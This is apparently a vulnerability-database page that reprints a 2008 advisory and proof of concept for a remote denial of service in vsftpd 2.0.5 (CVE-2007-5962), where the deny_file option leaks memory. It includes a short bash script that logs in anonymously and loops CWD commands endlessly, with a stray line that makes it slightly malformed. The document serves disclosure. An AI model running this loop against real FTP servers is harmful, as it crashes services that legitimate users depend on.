Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2007-5962

Publish Date: 21 May 2008

                							

                source: http://www.securityfocus.com/bid/29322/info


The 'vsftpd' FTP server is prone to a remote denial-of-service vulnerability because it fails to free allocated memory.

Successfully exploiting this issue allows remote attackers to crash the affected application, denying service to legitimate users. 

# echo deny_file=foo &gt;&gt; /etc/vsftpd/vsftpd.conf
# service vsftpd restart

$ cat &gt; memtest.sh &lt;&lt;EOF
 EOF
#!/bin/bash
echo USER anonymous
echo PASS foo@bar.com

while [ 1 ]; do
        echo CWD pub
        echo CWD ..
done
EOF

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (1)

Vulmon Search

About

Products

Connect